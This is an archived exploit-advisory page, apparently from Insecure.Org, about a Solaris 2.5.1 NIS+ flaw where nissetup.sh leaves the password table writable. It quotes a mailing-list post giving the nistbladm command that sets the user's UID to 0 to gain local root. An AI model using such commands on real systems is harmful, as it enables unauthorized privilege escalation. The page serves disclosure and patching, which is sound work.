Insecure Solaris default nissetup password table permissions!
|Description:||The nissetup.sh program for setting up NIS+ databases leaves insecure permissions on the password table. This allows you to, for example, use nistbladm to change your UID!|
|Compromise:|| root (local)|
|Vulnerable Systems:||Unpatched Solaris 2.5.1 systems (possibly earlier versions of Solaris). |
|Date:||10 February 1996 |
|Notes:||Here is an anonymous posting reminding us of the problem. Also, Casper Dik (casper@HOLLAND.SUN.COM) mentioned that just installing the Solaris patch doesn't fix the problem. You need to manually reset the bad permissions. How many people do you think forgot to do that? |
Date: Fri, 30 May 1997 19:44:40 +0200
From: Anonymous <nobody@REPLAY.COM>
Subject: NIS+, Solaris 2.5.1
Ever tried to change your NIS+ password with
the "nistbladm" command ? Works fine, but you
can also change your UID ....
$ nistbladm -e uid=0 '[name=alice]',passwd.org_dir
$ niscat passwd.org_dir | grep alice
. . . . . . . . . . .
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: